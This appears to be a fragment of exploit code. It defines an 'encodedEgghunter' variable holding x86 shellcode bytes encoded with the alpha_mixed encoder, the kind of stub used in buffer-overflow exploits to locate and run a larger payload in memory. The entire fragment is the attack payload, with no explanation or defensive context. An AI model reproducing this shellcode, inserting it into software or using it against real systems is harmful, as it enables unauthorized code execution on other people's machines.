#encoder = x86/alpha_mixed
encodedEgghunter =  ""
encodedEgghunter += "\x89\xe3\xda\xd1\xd9\x73\xf4\x59\x49\x49\x49\x49\x49"
encodedEgghunter += "\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37"
encodedEgghunter += "\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41"
encodedEgghunter += "\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
encodedEgghunter += "\x50\x38\x41\x42\x75\x4a\x49\x45\x36\x4e\x61\x79\x5a"
encodedEgghunter += "\x39\x6f\x74\x4f\x67\x32\x32\x72\x53\x5a\x54\x42\x50"
encodedEgghunter += "\x58\x48\x4d\x44\x6e\x65\x6c\x76\x65\x52\x7a\x62\x54"
encodedEgghunter += "\x4a\x4f\x4e\x58\x72\x57\x30\x30\x66\x50\x64\x34\x6c"
encodedEgghunter += "\x4b\x4b\x4a\x6e\x4f\x71\x65\x68\x6a\x6c\x6f\x74\x35"
encodedEgghunter += "\x6b\x57\x59\x6f\x7a\x47\x41\x41"
